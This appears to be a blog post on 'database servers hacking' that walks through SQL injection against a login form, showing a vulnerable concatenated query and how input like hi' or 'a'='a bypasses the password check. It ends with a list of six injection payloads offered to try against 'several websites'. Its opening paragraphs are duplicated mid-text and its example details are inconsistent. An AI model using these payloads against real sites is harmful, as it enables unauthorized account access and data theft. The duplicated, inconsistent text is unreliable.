Database Servers Hacking
Databases have been the spirit of a business website. An attack on the database servers can reason a great financial loss for the company. Database servers are generally hacked to get the credit card information. And just one hack on a business site will bring down its repute and also the customers as they also want their credit card info protected. Most of the business websites use Microsoft sql Server (MSsql) and Oracle db servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “indestructible” But hackers took it as a dispute and showed lots of bugs in it also.So I just want to share the knowledge with others.
Usually user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the login.php or logincheck.asp page where it will be checked using the query string. If it doesn't get an entry fulfilling the query and will arrive at end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this so what will you do then a hacker can simply login successfully without knowing the password. Want to know How ?
Lets look at the querry again.Databases have been the spirit of a business website. An attack on the database servers can reason a great financial loss for the company. Database servers are generally hacked to get the credit card information. And just one hack on a business site will bring down its repute and also the customers as they also want their credit card info protected. Most of the business websites use Microsoft sql Server (MSsql) and Oracle db servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “indestructible” But hackers took it as a dispute and showed lots of bugs in it also.So I just want to share the knowledge with others.
Usually user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the login.php or logincheck.asp page where it will be checked using the query string. If it doesn't get an entry fulfilling the query and will arrive at end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this so what will you do then a hacker can simply login successfully without knowing the password. Want to know How ?
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Now if a user types his login name as "Jhon" and password as "h3x3r" then these values will pass to the php or asp page with post way and then the above query will become
"Select * from table1 where login=' Jhon ' and password=' h3x3r ' "
Thats fine. There will be an entry Jhon and h4x3r in login and password fields in the database so we will get a message as login successful. Now what if I type loginname as "Jhon" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:
"Select * from table1 where login=' Jhon ' and password=' hi' or 'a'='a ' "
And submit and bingo###I will get the message as Login successful !! Did you see the neatness of hacker which was due to lack of care of web designer ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Jhon" !! You can try the following in the password text box if the above doesn't work for several websites:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Post a Comment